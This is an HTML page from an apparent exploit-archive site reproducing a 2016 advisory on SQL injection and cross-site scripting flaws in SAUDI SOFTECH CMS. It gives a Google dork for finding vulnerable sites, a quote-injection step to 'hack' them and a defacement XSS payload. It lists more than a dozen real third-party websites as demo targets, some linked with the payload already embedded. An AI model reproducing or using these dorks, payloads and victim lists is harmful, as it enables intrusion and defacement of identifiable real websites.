<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-35</title>
    </head>
    <body>
        <center>
                <a  href="https://mr-msa.xyz/guexdb/exploits/exploit-35" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
            ###########################

# SAUDI SOFTECH Cms Multiple Vulnerability

###########################

* Title : SAUDI SOFTECH Multiple Vulnerability
* date : 2016/5/11
* Exploit Author : Guardiran Security Team
* Google Dork : intext:&quot;Designed By: SAUDI SOFTECH&quot; inurl:?id=
* Vendor Homepage : http://saudisoftech.com/
* Version : All Version
* Tested On : Kali Linux / Windows 8.1 Mozila FireFox

Hello Guys.
This Is a Multiple Vulnerability ( Xss &amp; Sqli )

--------------------------

SQL INJECTION : 

insert \&quot; or \' After PATCH URL To Give The MYSQL Error.
Then You Can User The Command SQL Injection To Inject Website And Hack It.

Demo :

http://www.firefreeze.com.sa/products.php?id=7-11-194%27
http://mhbarghash.com.sa/news_details.php?id=4%27
http://www.sappco-dammam.com/pages.php?id=8
http://www.icec.com.sa/products.php?id=47%27
http://gic-saudi.com/page.php?id=53%27

XSS:

This CMS And Also Have Xss Vulnerability.
We Cnd Run Our Javacode In site.
Page vulnerable : [search.php]
Payload: &quot;&gt;&lt;marquee&gt;&lt;h1&gt;Hacked_By_MR.IMAN&lt;/h1&gt;&lt;/marquee&gt;

Demo : 

http://www.madicc.org/search.php
http://www.ghhl.net/search.php
http://www.misarabia.com.sa/search.php?keyword=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN%3C%2Fh1%3E%3C%2Fmarquee%3E&amp;search-btn=
http://www.qumaish.com/search.php
http://www.cmci-sa.com/search.php
http://www.bazy.com.sa/search.php
http://www.acarabia.com/search.php?s=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN%3C%2Fh1%3E%3C%2Fmarquee%3E&amp;submit.x=27&amp;submit.y=9&amp;submit=Search

* Special Tnx : cod3!nj3ct!0n , REX , alizombie , DR.GrYgHoN , MR.IMAN , reza attacker
* Discovered By : MR.IMAN ~~ demon.hacker37@yahoo.com ~~ telegram.me/MRBLACK ~~ Skype:offsec_mr_iman
* We Are Guardiran Security Team
        </pre>
    </body>
</html>